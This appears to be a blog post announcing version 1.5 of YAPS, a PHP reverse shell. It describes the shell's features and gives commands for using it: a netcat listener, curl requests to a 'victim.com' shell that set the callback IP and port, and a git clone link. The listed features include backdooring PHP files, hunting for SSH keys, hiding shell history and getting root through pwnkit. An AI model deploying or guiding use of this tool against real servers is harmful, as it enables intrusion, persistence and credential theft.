YAPS v1.5 releases: Yet Another PHP Shell

by do son · Published · Updated

PHP reverse shell

YAPS – Yet Another PHP Shell

As the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there. It is a single PHP file containing all its functions and you can control it via a simple netcat listener (nc -lp 1337).

In the current version, its main functions support only Linux systems, but I’m planning to make it work with Windows too.

Features

  • Single PHP file (no need to install packages, libs, or download tons of files)
  • Works with netcat, ncat, socat, multi/handler, almost any listener
  • Customizable password protection
  • No logs in .bash_history
  • Does some enumeration
    • Network info (interfaces, iptables rules, active ports)
    • User info
    • List SUID and GUID files
    • Search for SSH keys (public and private)
    • List crontab
    • List writable PHP files
  • Auto download LinPEAS, LinEnum or Linux Exploit Suggester
  • Write and run PHP code on remote host
  • (Semi) Stabilize shell
  • Duplicate connections
  • Auto update
  • Infect PHP files with backdoors
  • [NEW] Auto reverse root shell via pwnkit (CVE-2021-4034)

Cons

  • Connection isn’t encrypted (yet) (nc does not support SSL)
  • Not fully interactive (although you can spawn an interactive shell with !stabilize)
    • CTRL+C breaks it; can’t use arrows to navigate (unless you use rlwrap nc -lp <ip> <port>)

Usage

  1. Set up a TCP listener;
  2. Set your IP and port. This can be done by:
  • 2.1 Editing the variables at the start of the script;
  • 2.2 Setting them via web request (curl -x POST -d “x=ip&y=port” victim.com/yaps.php or curl victim.com/yaps.php?x=ip&y=port);
  1. Open yaps.php on the browser or curl it;
  • 3.1 You can set yaps.php?s or yaps.php?silent to suppress the banner

Working commands

!help – Display the help menu
!all-colors – Toggle all colors (compatible with colorless TTY)
!color – Toggle PS1 color (locally only, no environment variable is changed)
!enum – Download LinPEAS and LinEnum to /tmp and get them ready to use
!info – list informations about the target (the enumeration I mentioned above)
!stabilize – Spawn an interactive reverse shell on another port (works w/ sudo, su, mysql, etc.)
!passwd – Password option (enable, disable, set, modify)
!php – Write and run PHP on the remote host
!suggester – Download Linux Exploit Suggester to /tmp and get it ready to use

Changelog v1.5

  • Added !shellcode to receive and run an arbitrary shellcode
  • Improved duplicate() function (you can now a range of ports)
  • Changed function name from stabilize to interactive
  • Packed embedded codes to save space
  • Fixed broken links
  • Prepend TERM=xterm to all commands
  • Minor improvements

Download

git clone https://github.com/Nickguitar/YAPS.git

Source: https://github.com/Nickguitar/

Tags: YAPS